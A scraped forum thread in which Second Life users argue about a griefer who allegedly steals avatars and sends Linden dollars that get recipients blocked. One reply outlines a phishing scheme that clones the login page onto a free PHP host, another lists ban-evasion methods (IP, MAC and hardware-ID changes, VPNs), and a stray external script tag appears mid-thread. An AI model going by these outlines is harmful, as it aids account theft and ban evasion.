Linden Dollar from strangers

You are about to reply to a thread that has been inactive for 3968 days.

Please take a moment to consider if this thread is worth bumping.

This is a problem that at least in the Italian community has been present for two years due to a person, a famous Italian griefers. This person steals avatar, linden dollar sends users. The poor user finds himself blocked by Linden Lab There have been many reports to this person but continues to enter with new avatar.
Now I ask myself.
Is there no system to prevent automatically receive L$ ?
It is also strange that this griefers able to steal so many avatars. A year ago he was also able to steal avatar Linden Lab and consequently close several land. Many people have abandoned Second Life for this reason. I think he uses an illegal viewer but my biggest concern is that there is a bug in the Linden code.

An example: Recently a person ex Official LL mentor has been blocked for having received L $ 1000 when he was offline

This situation is no longer acceptable!

I'm not sure how to stop that but  I don't think that any viewer can access your login information you have to give it to the person somehow. The most common scheme for this is that someone setup a database on a site that doesn't check your information. I think it's usually altavista which I believe is an italian owned site actually. It gives you a free php database. Fro there it's a matter of copying LL's official sign in page so that it sends the information to your database when they fill out the form and then just spamming out the link claiming it's some free something or other on MP and wait for the suckers to fill int that form. If you know just a little php mysql and HTML CSS it's not to terribly hard to setup unfortunatly. Even someone with a little knowledge like me could probably accomplish the task.

Yes, I know the system to steal an avatar (the usual link Altervista market place) but is it possible that so many people are so stupid?
However, the problem of sending L$ and consequently blocked by LL avatar is not resolved. I ask me where this person can find many linden dollar to pass by the poor users off line. There are videos on You tube where he does this (of course with a stolen avatar)

All security blocks can be circumvented basically. Its not hard to get a new IP. If their hardware is banned then get a new hard drive or hack the drive info and change the numbers. If their Mac address is banned then they change Mac address. VPN can also be used to circumvent.

Blocks and rules keep the honest people out. It would take legal action to their ISP and local law enforcement.

If someone send you money that you don't know, then return it, then you wont get in trouble..

I had a person tell me once that they got lindens from someone else's account and asked if I wanted it. I said no. I want no part of it. He sent me the money anyway. I sent it back and filed an abuse report because the activity was suspicious. And that's how you stay out of trouble.

More investigation goes into it than just slamming anyone who received stolen money.

I dont see how blocking payments while off line will solve anything. When you log in and see extra cash then its not too hard to look up transaction history and return the money. I doubt LL bans anyone for unsolicited payments

This person send you L$ when you're offline, if you try to login in SL after sometime or one day you are blocked for investigation. This happened to my friend (ex Mentor LL and Beta tester viewer) 2 days ago.

I myself am EX Mentor LL and beta tester viewers and every day users send me a IM for this problem. 

Ive been in Sl for about 7 years and ran 2 popular clubs/ mentored etc. with many tip jars or donation boxes. I Never been blocked from logging in because of receiving bad funds. I can see how it would be a concern. But seems there is more to that story if you ask me. But thats just  my oppinion. If it was so easy to wreak havoc on someone this way then it would going on a lot.

It used to make me cringe sometimes when I would get $L10,000 donations, wondering if it was legit money, but never once was an issue concerning lindens in my 6 years running popular clubs

Sniper Siemens wrote:

It is also strange that this griefers able to steal so many avatars.
A year ago he was also able to steal avatar Linden Lab and consequently close several land.
Many people have abandoned Second Life for this reason. I think he uses an illegal viewer but my biggest concern is that there is a bug in the Linden code.

Where is the proof that this ever actually happened?

If It had, I'd expect to see some of the major blogs writing about it, and at least one or two lawsuits against LLs (with any OTHER company, I would expect a press release on password security, etc..., but with LLs, since they tend to remain silent, I would expect to see lawsuits).

(LLS has the WORST publicity and public relations department possibly of any company on the globe in the last century... The NSA and the Gestapo is/were better at getting good public relations press than these guys... and time after time it bites them in the keester, but... if this had actually happened, it would have been BIG NEWS in the SL world. As in covered by the "sane" blogs and not just the paranoia theory ones.)

Sniper Siemens wrote:

Yes, I know the system to steal an avatar (the usual link Altervista market place) but is it possible that so many people are so stupid?

Simple answer.  YES

But even smart people get caught by this.  Don't Click The Link

Sniper Siemens wrote:

However, the problem of sending L$ and consequently blocked by LL avatar is not resolved.

If the problem with accounts being blocked was as ubiquitous as you are making it out to be, well I know this Forum pretty good.  We'd have seen a lot more complaints about it and honestly I can't think of any one who has ever posted about it before.  I'm not saying that it hasn't happened, but your post makes me go hmmmm.

The proof that this has ever happened?
We are serious people .. I am in SL since 2005.
There are transactions, mails, chat logs and im with threats of this griefers.
There are testimonials from friends who have left SL for this reason.
There are dozens of people who have been blocked for this reason
I do not go around telling lies.

There is a problem.
I asked if it would be possible at least to have the ability to accept L $

IF, and a big if, the Lindens were purchased illegally and not through authorized Linden providers and the credit card used to buy the L was fraudulent, then LL very easily could have blocked the account during investigation. They will react to that rather quickly. It's possible that this is what happened...just saying

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={EEC085C4-7C23-41DA-81DD-240F2C2A3341}&d=2013-7-21&s=http://community.secondlife.com/t5/forums/replypage/board-id/GeneralDiscussionForum/message-id/116542&cb=0.26417855194152184"></script>

as I have already written .. I do not know how he can have all of these L $ ...
There are transactions and mail address of the LL.
And I repeat again .... I'm not a person who likes to put post imaginative and telling lies.
This is a serious problem ... think of it as you want

The video shows clearly the origin of all these L$, They were bought through the viewer, directly from Lindex, with an approved payment info in LL (what means a real name and bank info in their records). I know cases of people being put in hung for investigation for receiving supected L$ - bought from non-authorised 3rd parts, but never right from Lindex, as is shown in the video.

Besides that, the "culprit" made the video. How it reached you? Or was made it by yourself?

And we have only your word that the guy was "banned" after that. In retrospective, I am sorry to say that I don't trust your word.

You are about to reply to a thread that has been inactive for 3968 days.

Please take a moment to consider if this thread is worth bumping.